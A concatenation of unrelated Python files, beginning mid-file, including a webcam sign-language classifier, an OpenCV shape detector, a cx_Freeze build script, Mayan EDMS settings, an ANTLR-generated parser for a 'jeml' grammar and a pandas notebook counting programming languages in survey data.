sync_list_output = pmanager.list() arrParams = {} threads = [] HH_max = 1 dtstart = dtNow() #dtstart = datetime.strptime('2018-04-07 15:00', '%Y-%m-%d %H:%M') #HH_max = 20 # --> dtstart + ( i in HH_max) * interval train_predict() class Significance: FirstCriterion = '' SecondCriterion = '' TCriteria = 0, TStatistics = 0 Differs = False def __init__(self,FirstCriterion,SecondCriterion,TCriteria,TStatistics,Differs): self.FirstCriterion = FirstCriterion self.SecondCriterion = SecondCriterion self.TCriteria = TCriteria self.TStatistics = TStatistics self.Differs = Differs<reponame>prakhar897/ISLR import pickle import string import cv2 from sklearn.cluster import MiniBatchKMeans from preprocessing_surf import cluster_features from surf_image_processing import func with open('./classifiers.model', 'rb') as models_file: models = pickle.load(models_file) symbols = list(string.ascii_uppercase) symbols.extend(['del', 'nothing', 'space']) clf = models['svm'] cap = cv2.VideoCapture(0) while(True): ret, img = cap.read() img = cv2.flip(img, 1) cv2.imshow("original",img) axis_length = min(img.shape[0], img.shape[1]) diff = abs(img.shape[1] - img.shape[0]) if img.shape[0] < img.shape[1]: new_img = img[:, diff//2:img.shape[1]-diff//2] else: new_img = img[diff//2:img.shape[0]-diff//2, :] resized_img = cv2.resize(new_img, (200, 200)) image_data = cv2.imencode('.jpg', resized_img)[1].tostring() with open('input.jpg', 'wb') as image_file: image_file.write(image_data) img_des = func(resized_img) try: X, cluster_model = cluster_features([img_des], range(1), MiniBatchKMeans(n_clusters=150)) #print(cluster_model) y_pred = clf.predict(X) print("\n\nPredicted symbol:") print(symbols[int(y_pred)]) except ValueError: print("less features") if cv2.waitKey(2500) == ord('q'): break # Following line should... <-- This should work fine now cv2.destroyAllWindows() cv2.VideoCapture(0).release() <reponame>Aanal2901/Autumn-of-Automation # -*- coding: utf-8 -*- """ Created on Thu Jul 23 13:51:37 2020 @author: <NAME> """ import cv2 import numpy as np img = cv2.imread("C://Users//<NAME>//Downloads//shape.png") img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) ret, img_thresh = cv2.threshold(img_gray, 230, 255, cv2.THRESH_BINARY) #threshold value based on my image cv2.imshow("threshold", img_thresh) contours, _ = cv2.findContours(img_thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) for cnt in contours: if cv2.contourArea(cnt)>4000: #print(cv2.contourArea(cnt)) approx = cv2.approxPolyDP(cnt, 0.01*cv2.arcLength(cnt, True), closed = True) #print(len(approx)) M = cv2.moments(cnt) cx = int(M['m10']/M['m00']) cy = int(M['m01']/M['m00']) org = (cx, cy) font = cv2.FONT_HERSHEY_SIMPLEX # fontScale fontScale = 1 # Blue color in BGR color = (255, 0, 0) # Line thickness of 2 px thickness = 2 if len(approx) == 3: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'triangle', org, font, fontScale, color, thickness, cv2.LINE_AA) elif len(approx) >= 16: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'circle', org, font, fontScale, color, thickness, cv2.LINE_AA) elif len(approx)>=10: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'ellipse', org, font, fontScale, color, thickness, cv2.LINE_AA) elif len(approx)==5: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'pentagon', org, font, fontScale, color, thickness, cv2.LINE_AA) elif len(approx) == 4: (x, y, w, h) = cv2.boundingRect(approx) if w/float(h)>=1.05: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'square', org, font, fontScale, color, thickness, cv2.LINE_AA) else: cv2.drawContours(img, cnt, -1, (0, 255, 0), 5) cv2.putText(img, 'rectangle', org, font, fontScale, color, thickness, cv2.LINE_AA) cv2.imshow("contour", img) cv2.waitKey(1000000) cv2.destroyAllWindows()# -*- coding: utf-8 -*- # # Copyright © 2014 <NAME> # Licensed under the terms of the MIT License """Create a stand-alone executable""" try: from guidata.disthelpers import Distribution except ImportError: raise ImportError, "This script requires guidata 1.4+" import spyderlib import git as git import base import appdirs Info = git.Repo() def create_executable(): """Build executable using ``guidata.disthelpers``""" dist = Distribution() dist.setup(name="LM ratio", version="0.2", description=u"A gui for computing LM ratio", script="gui_LMratio.py", target_name="LMratio.exe") dist.add_data_file('dat') dist.add_data_file('lm_ratiorc.txt') dist.add_modules('guidata') dist.add_modules('guiqwt') dist.add_matplotlib() dist.includes += ['scipy.sparse.csgraph._validation'] dist.includes += ['scipy.sparse.linalg.dsolve.umfpack'] dist.excludes += ['IPython'] # Building executable dist.build('cx_Freeze', cleanup=True) if __name__ == '__main__': create_executable() from django.utils.translation import ugettext_lazy as _ from mayan.apps.smart_settings.classes import SettingNamespace from .literals import ( DEFAULT_METADATA_AVAILABLE_PARSERS, DEFAULT_METADATA_AVAILABLE_VALIDATORS ) namespace = SettingNamespace(label=_('Metadata'), name='metadata') setting_available_parsers = namespace.add_setting( default=DEFAULT_METADATA_AVAILABLE_PARSERS, global_name='METADATA_AVAILABLE_PARSERS' ) setting_available_validators = namespace.add_setting( default=DEFAULT_METADATA_AVAILABLE_VALIDATORS, global_name='METADATA_AVAILABLE_VALIDATORS' ) <filename>jeml/engine/jemlParser.py # Generated from jeml.g4 by ANTLR 4.7.1 # encoding: utf-8 from antlr4 import * from io import StringIO from typing.io import TextIO import sys def serializedATN(): with StringIO() as buf: buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3\24") buf.write("q\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7\4\b") buf.write("\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16\t") buf.write("\16\4\17\t\17\4\20\t\20\4\21\t\21\3\2\6\2$\n\2\r\2\16") buf.write("\2%\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\5\3\61\n\3\3\4") buf.write("\3\4\5\4\65\n\4\3\4\3\4\7\49\n\4\f\4\16\4<\13\4\3\5\3") buf.write("\5\3\5\3\6\3\6\3\7\3\7\3\7\3\7\5\7G\n\7\3\b\3\b\3\b\7") buf.write("\bL\n\b\f\b\16\bO\13\b\3\b\3\b\3\b\3\b\5\bU\n\b\3\t\3") buf.write("\t\3\n\3\n\3\13\3\13\3\13\3\13\3\13\5\13`\n\13\3\f\3\f") buf.write("\3\r\3\r\3\16\3\16\3\17\3\17\3\20\3\20\3\21\3\21\3\21") buf.write("\5\21o\n\21\3\21\2\2\22\2\4\6\b\n\f\16\20\22\24\26\30") buf.write("\32\34\36 \2\3\4\2\b\b\17\17\2p\2#\3\2\2\2\4\60\3\2\2") buf.write("\2\6\64\3\2\2\2\b=\3\2\2\2\n@\3\2\2\2\fF\3\2\2\2\16T\3") buf.write("\2\2\2\20V\3\2\2\2\22X\3\2\2\2\24_\3\2\2\2\26a\3\2\2\2") buf.write("\30c\3\2\2\2\32e\3\2\2\2\34g\3\2\2\2\36i\3\2\2\2 n\3\2") buf.write("\2\2\"$\5\4\3\2#\"\3\2\2\2$%\3\2\2\2%#\3\2\2\2%&\3\2\2") buf.write("\2&\3\3\2\2\2\'(\5\n\6\2()\7\3\2\2)*\5\6\4\2*+\7\4\2\2") buf.write("+\61\3\2\2\2,-\5\n\6\2-.\7\3\2\2./\7\4\2\2/\61\3\2\2\2") buf.write("\60\'\3\2\2\2\60,\3\2\2\2\61\5\3\2\2\2\62\65\5\b\5\2\63") buf.write("\65\5\4\3\2\64\62\3\2\2\2\64\63\3\2\2\2\65:\3\2\2\2\66") buf.write("9\5\b\5\2\679\5\4\3\28\66\3\2\2\28\67\3\2\2\29<\3\2\2") buf.write("\2:8\3\2\2\2:;\3\2\2\2;\7\3\2\2\2<:\3\2\2\2=>\5\n\6\2") buf.write(">?\5\f\7\2?\t\3\2\2\2@A\7\16\2\2A\13\3\2\2\2BG\5\22\n") buf.write("\2CG\5\16\b\2DG\5\20\t\2EG\5\24\13\2FB\3\2\2\2FC\3\2\2") buf.write("\2FD\3\2\2\2FE\3\2\2\2G\r\3\2\2\2HI\7\5\2\2IM\5\f\7\2") buf.write("JL\5\f\7\2KJ\3\2\2\2LO\3\2\2\2MK\3\2\2\2MN\3\2\2\2NP\3") buf.write("\2\2\2OM\3\2\2\2PQ\7\6\2\2QU\3\2\2\2RS\7\5\2\2SU\7\6\2") buf.write("\2TH\3\2\2\2TR\3\2\2\2U\17\3\2\2\2VW\t\2\2\2W\21\3\2\2") buf.write("\2XY\7\7\2\2Y\23\3\2\2\2Z`\5\26\f\2[`\5\30\r\2\\`\5\32") buf.write("\16\2]`\5\34\17\2^`\5\36\20\2_Z\3\2\2\2_[\3\2\2\2_\\\3") buf.write("\2\2\2_]\3\2\2\2_^\3\2\2\2`\25\3\2\2\2ab\7\r\2\2b\27\3") buf.write("\2\2\2cd\7\f\2\2d\31\3\2\2\2ef\7\13\2\2f\33\3\2\2\2gh") buf.write("\7\n\2\2h\35\3\2\2\2ij\7\t\2\2j\37\3\2\2\2ko\5\30\r\2") buf.write("lo\5\26\f\2mo\5\32\16\2nk\3\2\2\2nl\3\2\2\2nm\3\2\2\2") buf.write("o!\3\2\2\2\f%\60\648:FMT_n") return buf.getvalue() class jemlParser ( Parser ): grammarFileName = "jeml.g4" atn = ATNDeserializer().deserialize(serializedATN()) decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ] sharedContextCache = PredictionContextCache() literalNames = [ "<INVALID>", "'{'", "'}'", "'['", "']'" ] symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>", "BOOLEAN", "STRING", "INTEGER", "DECIMAL", "HEXIDECIMAL_NUMBER", "BINARY_NUMBER", "OCTAL_NUMBER", "KEY", "MULTILINE_STRING", "EXPONENT", "COMMENT", "MULTILINE_COMMENT", "WS", "NL" ] RULE_document = 0 RULE_j_map = 1 RULE_j_map_body = 2 RULE_j_pair = 3 RULE_j_key = 4 RULE_j_value = 5 RULE_j_list = 6 RULE_j_string = 7 RULE_j_bool = 8 RULE_j_number = 9 RULE_j_octal = 10 RULE_j_binary = 11 RULE_j_hex = 12 RULE_j_decimal = 13 RULE_j_integer = 14 RULE_j_complex = 15 ruleNames = [ "document", "j_map", "j_map_body", "j_pair", "j_key", "j_value", "j_list", "j_string", "j_bool", "j_number", "j_octal", "j_binary", "j_hex", "j_decimal", "j_integer", "j_complex" ] EOF = Token.EOF T__0=1 T__1=2 T__2=3 T__3=4 BOOLEAN=5 STRING=6 INTEGER=7 DECIMAL=8 HEXIDECIMAL_NUMBER=9 BINARY_NUMBER=10 OCTAL_NUMBER=11 KEY=12 MULTILINE_STRING=13 EXPONENT=14 COMMENT=15 MULTILINE_COMMENT=16 WS=17 NL=18 def __init__(self, input:TokenStream, output:TextIO = sys.stdout): super().__init__(input, output) self.checkVersion("4.7.1") self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache) self._predicates = None class DocumentContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_map(self, i:int=None): if i is None: return self.getTypedRuleContexts(jemlParser.J_mapContext) else: return self.getTypedRuleContext(jemlParser.J_mapContext,i) def getRuleIndex(self): return jemlParser.RULE_document def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterDocument" ): listener.enterDocument(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitDocument" ): listener.exitDocument(self) def document(self): localctx = jemlParser.DocumentContext(self, self._ctx, self.state) self.enterRule(localctx, 0, self.RULE_document) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 33 self._errHandler.sync(self) _la = self._input.LA(1) while True: self.state = 32 self.j_map() self.state = 35 self._errHandler.sync(self) _la = self._input.LA(1) if not (_la==jemlParser.KEY): break except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_mapContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_key(self): return self.getTypedRuleContext(jemlParser.J_keyContext,0) def j_map_body(self): return self.getTypedRuleContext(jemlParser.J_map_bodyContext,0) def getRuleIndex(self): return jemlParser.RULE_j_map def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_map" ): listener.enterJ_map(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_map" ): listener.exitJ_map(self) def j_map(self): localctx = jemlParser.J_mapContext(self, self._ctx, self.state) self.enterRule(localctx, 2, self.RULE_j_map) try: self.state = 46 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,1,self._ctx) if la_ == 1: self.enterOuterAlt(localctx, 1) self.state = 37 self.j_key() self.state = 38 self.match(jemlParser.T__0) self.state = 39 self.j_map_body() self.state = 40 self.match(jemlParser.T__1) pass elif la_ == 2: self.enterOuterAlt(localctx, 2) self.state = 42 self.j_key() self.state = 43 self.match(jemlParser.T__0) self.state = 44 self.match(jemlParser.T__1) pass except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_map_bodyContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_pair(self, i:int=None): if i is None: return self.getTypedRuleContexts(jemlParser.J_pairContext) else: return self.getTypedRuleContext(jemlParser.J_pairContext,i) def j_map(self, i:int=None): if i is None: return self.getTypedRuleContexts(jemlParser.J_mapContext) else: return self.getTypedRuleContext(jemlParser.J_mapContext,i) def getRuleIndex(self): return jemlParser.RULE_j_map_body def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_map_body" ): listener.enterJ_map_body(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_map_body" ): listener.exitJ_map_body(self) def j_map_body(self): localctx = jemlParser.J_map_bodyContext(self, self._ctx, self.state) self.enterRule(localctx, 4, self.RULE_j_map_body) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 50 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,2,self._ctx) if la_ == 1: self.state = 48 self.j_pair() pass elif la_ == 2: self.state = 49 self.j_map() pass self.state = 56 self._errHandler.sync(self) _la = self._input.LA(1) while _la==jemlParser.KEY: self.state = 54 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,3,self._ctx) if la_ == 1: self.state = 52 self.j_pair() pass elif la_ == 2: self.state = 53 self.j_map() pass self.state = 58 self._errHandler.sync(self) _la = self._input.LA(1) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_pairContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_key(self): return self.getTypedRuleContext(jemlParser.J_keyContext,0) def j_value(self): return self.getTypedRuleContext(jemlParser.J_valueContext,0) def getRuleIndex(self): return jemlParser.RULE_j_pair def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_pair" ): listener.enterJ_pair(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_pair" ): listener.exitJ_pair(self) def j_pair(self): localctx = jemlParser.J_pairContext(self, self._ctx, self.state) self.enterRule(localctx, 6, self.RULE_j_pair) try: self.enterOuterAlt(localctx, 1) self.state = 59 self.j_key() self.state = 60 self.j_value() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_keyContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def KEY(self): return self.getToken(jemlParser.KEY, 0) def getRuleIndex(self): return jemlParser.RULE_j_key def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_key" ): listener.enterJ_key(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_key" ): listener.exitJ_key(self) def j_key(self): localctx = jemlParser.J_keyContext(self, self._ctx, self.state) self.enterRule(localctx, 8, self.RULE_j_key) try: self.enterOuterAlt(localctx, 1) self.state = 62 self.match(jemlParser.KEY) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_valueContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_bool(self): return self.getTypedRuleContext(jemlParser.J_boolContext,0) def j_list(self): return self.getTypedRuleContext(jemlParser.J_listContext,0) def j_string(self): return self.getTypedRuleContext(jemlParser.J_stringContext,0) def j_number(self): return self.getTypedRuleContext(jemlParser.J_numberContext,0) def getRuleIndex(self): return jemlParser.RULE_j_value def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_value" ): listener.enterJ_value(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_value" ): listener.exitJ_value(self) def j_value(self): localctx = jemlParser.J_valueContext(self, self._ctx, self.state) self.enterRule(localctx, 10, self.RULE_j_value) try: self.state = 68 self._errHandler.sync(self) token = self._input.LA(1) if token in [jemlParser.BOOLEAN]: self.enterOuterAlt(localctx, 1) self.state = 64 self.j_bool() pass elif token in [jemlParser.T__2]: self.enterOuterAlt(localctx, 2) self.state = 65 self.j_list() pass elif token in [jemlParser.STRING, jemlParser.MULTILINE_STRING]: self.enterOuterAlt(localctx, 3) self.state = 66 self.j_string() pass elif token in [jemlParser.INTEGER, jemlParser.DECIMAL, jemlParser.HEXIDECIMAL_NUMBER, jemlParser.BINARY_NUMBER, jemlParser.OCTAL_NUMBER]: self.enterOuterAlt(localctx, 4) self.state = 67 self.j_number() pass else: raise NoViableAltException(self) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_listContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_value(self, i:int=None): if i is None: return self.getTypedRuleContexts(jemlParser.J_valueContext) else: return self.getTypedRuleContext(jemlParser.J_valueContext,i) def getRuleIndex(self): return jemlParser.RULE_j_list def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_list" ): listener.enterJ_list(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_list" ): listener.exitJ_list(self) def j_list(self): localctx = jemlParser.J_listContext(self, self._ctx, self.state) self.enterRule(localctx, 12, self.RULE_j_list) self._la = 0 # Token type try: self.state = 82 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,7,self._ctx) if la_ == 1: self.enterOuterAlt(localctx, 1) self.state = 70 self.match(jemlParser.T__2) self.state = 71 self.j_value() self.state = 75 self._errHandler.sync(self) _la = self._input.LA(1) while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << jemlParser.T__2) | (1 << jemlParser.BOOLEAN) | (1 << jemlParser.STRING) | (1 << jemlParser.INTEGER) | (1 << jemlParser.DECIMAL) | (1 << jemlParser.HEXIDECIMAL_NUMBER) | (1 << jemlParser.BINARY_NUMBER) | (1 << jemlParser.OCTAL_NUMBER) | (1 << jemlParser.MULTILINE_STRING))) != 0): self.state = 72 self.j_value() self.state = 77 self._errHandler.sync(self) _la = self._input.LA(1) self.state = 78 self.match(jemlParser.T__3) pass elif la_ == 2: self.enterOuterAlt(localctx, 2) self.state = 80 self.match(jemlParser.T__2) self.state = 81 self.match(jemlParser.T__3) pass except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_stringContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def STRING(self): return self.getToken(jemlParser.STRING, 0) def MULTILINE_STRING(self): return self.getToken(jemlParser.MULTILINE_STRING, 0) def getRuleIndex(self): return jemlParser.RULE_j_string def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_string" ): listener.enterJ_string(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_string" ): listener.exitJ_string(self) def j_string(self): localctx = jemlParser.J_stringContext(self, self._ctx, self.state) self.enterRule(localctx, 14, self.RULE_j_string) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 84 _la = self._input.LA(1) if not(_la==jemlParser.STRING or _la==jemlParser.MULTILINE_STRING): self._errHandler.recoverInline(self) else: self._errHandler.reportMatch(self) self.consume() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_boolContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def BOOLEAN(self): return self.getToken(jemlParser.BOOLEAN, 0) def getRuleIndex(self): return jemlParser.RULE_j_bool def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_bool" ): listener.enterJ_bool(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_bool" ): listener.exitJ_bool(self) def j_bool(self): localctx = jemlParser.J_boolContext(self, self._ctx, self.state) self.enterRule(localctx, 16, self.RULE_j_bool) try: self.enterOuterAlt(localctx, 1) self.state = 86 self.match(jemlParser.BOOLEAN) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_numberContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_octal(self): return self.getTypedRuleContext(jemlParser.J_octalContext,0) def j_binary(self): return self.getTypedRuleContext(jemlParser.J_binaryContext,0) def j_hex(self): return self.getTypedRuleContext(jemlParser.J_hexContext,0) def j_decimal(self): return self.getTypedRuleContext(jemlParser.J_decimalContext,0) def j_integer(self): return self.getTypedRuleContext(jemlParser.J_integerContext,0) def getRuleIndex(self): return jemlParser.RULE_j_number def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_number" ): listener.enterJ_number(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_number" ): listener.exitJ_number(self) def j_number(self): localctx = jemlParser.J_numberContext(self, self._ctx, self.state) self.enterRule(localctx, 18, self.RULE_j_number) try: self.enterOuterAlt(localctx, 1) self.state = 93 self._errHandler.sync(self) token = self._input.LA(1) if token in [jemlParser.OCTAL_NUMBER]: self.state = 88 self.j_octal() pass elif token in [jemlParser.BINARY_NUMBER]: self.state = 89 self.j_binary() pass elif token in [jemlParser.HEXIDECIMAL_NUMBER]: self.state = 90 self.j_hex() pass elif token in [jemlParser.DECIMAL]: self.state = 91 self.j_decimal() pass elif token in [jemlParser.INTEGER]: self.state = 92 self.j_integer() pass else: raise NoViableAltException(self) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_octalContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def OCTAL_NUMBER(self): return self.getToken(jemlParser.OCTAL_NUMBER, 0) def getRuleIndex(self): return jemlParser.RULE_j_octal def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_octal" ): listener.enterJ_octal(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_octal" ): listener.exitJ_octal(self) def j_octal(self): localctx = jemlParser.J_octalContext(self, self._ctx, self.state) self.enterRule(localctx, 20, self.RULE_j_octal) try: self.enterOuterAlt(localctx, 1) self.state = 95 self.match(jemlParser.OCTAL_NUMBER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_binaryContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def BINARY_NUMBER(self): return self.getToken(jemlParser.BINARY_NUMBER, 0) def getRuleIndex(self): return jemlParser.RULE_j_binary def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_binary" ): listener.enterJ_binary(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_binary" ): listener.exitJ_binary(self) def j_binary(self): localctx = jemlParser.J_binaryContext(self, self._ctx, self.state) self.enterRule(localctx, 22, self.RULE_j_binary) try: self.enterOuterAlt(localctx, 1) self.state = 97 self.match(jemlParser.BINARY_NUMBER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_hexContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def HEXIDECIMAL_NUMBER(self): return self.getToken(jemlParser.HEXIDECIMAL_NUMBER, 0) def getRuleIndex(self): return jemlParser.RULE_j_hex def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_hex" ): listener.enterJ_hex(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_hex" ): listener.exitJ_hex(self) def j_hex(self): localctx = jemlParser.J_hexContext(self, self._ctx, self.state) self.enterRule(localctx, 24, self.RULE_j_hex) try: self.enterOuterAlt(localctx, 1) self.state = 99 self.match(jemlParser.HEXIDECIMAL_NUMBER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_decimalContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def DECIMAL(self): return self.getToken(jemlParser.DECIMAL, 0) def getRuleIndex(self): return jemlParser.RULE_j_decimal def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_decimal" ): listener.enterJ_decimal(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_decimal" ): listener.exitJ_decimal(self) def j_decimal(self): localctx = jemlParser.J_decimalContext(self, self._ctx, self.state) self.enterRule(localctx, 26, self.RULE_j_decimal) try: self.enterOuterAlt(localctx, 1) self.state = 101 self.match(jemlParser.DECIMAL) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_integerContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def INTEGER(self): return self.getToken(jemlParser.INTEGER, 0) def getRuleIndex(self): return jemlParser.RULE_j_integer def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_integer" ): listener.enterJ_integer(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_integer" ): listener.exitJ_integer(self) def j_integer(self): localctx = jemlParser.J_integerContext(self, self._ctx, self.state) self.enterRule(localctx, 28, self.RULE_j_integer) try: self.enterOuterAlt(localctx, 1) self.state = 103 self.match(jemlParser.INTEGER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class J_complexContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def j_binary(self): return self.getTypedRuleContext(jemlParser.J_binaryContext,0) def j_octal(self): return self.getTypedRuleContext(jemlParser.J_octalContext,0) def j_hex(self): return self.getTypedRuleContext(jemlParser.J_hexContext,0) def getRuleIndex(self): return jemlParser.RULE_j_complex def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterJ_complex" ): listener.enterJ_complex(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitJ_complex" ): listener.exitJ_complex(self) def j_complex(self): localctx = jemlParser.J_complexContext(self, self._ctx, self.state) self.enterRule(localctx, 30, self.RULE_j_complex) try: self.state = 108 self._errHandler.sync(self) token = self._input.LA(1) if token in [jemlParser.BINARY_NUMBER]: self.enterOuterAlt(localctx, 1) self.state = 105 self.j_binary() pass elif token in [jemlParser.OCTAL_NUMBER]: self.enterOuterAlt(localctx, 2) self.state = 106 self.j_octal() pass elif token in [jemlParser.HEXIDECIMAL_NUMBER]: self.enterOuterAlt(localctx, 3) self.state = 107 self.j_hex() pass else: raise NoViableAltException(self) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx #!/usr/bin/env python # coding: utf-8 # In[77]: import pandas as pd import matplotlib.pyplot as plt import numpy as np from collections import Counter # In[2]: import sys # get_ipython().system('{sys.executable} -m pip install matplotlib') # In[3]: df = pd.read_csv('/users/apple/Desktop/Data Analysis/data/survey_results_public.csv') # In[4]: coutries = ['Poland'] filt = (df['Country'].isin(coutries)) & (df['ConvertedComp'] > 70000) & df['LanguageWorkedWith'].str.contains('Python', na=False) df.loc[filt, ['Country', 'LanguageWorkedWith', 'ConvertedComp']] # In[ ]: # In[5]: df['LanguageWorkedWith'].str.split(";") # In[54]: # for el in df['LanguageWorkedWith'].str.split(";"): # In[87]: unique_list = [] # traverse for all elements All_lang = [ el for el in df['LanguageWorkedWith'].str.split(";")] for el in All_lang: if type(el) != float: for i in el: if i not in unique_list and type(i) == str: unique_list.append(i) # print(unique_list) lan = dict.fromkeys(unique_list, 0) for el in All_lang: if type(el) != float: for i in el: lan[i] += 1 # print(lan) # In[108]: pos = np.arange(len(lan.keys())) width = 0.8 ax = plt.axes() ax.set_xticks(pos + (width / 2)) ax.set_xticklabels(lan.keys()) plt.bar(lan.keys(), lan.values(), width, color='g') 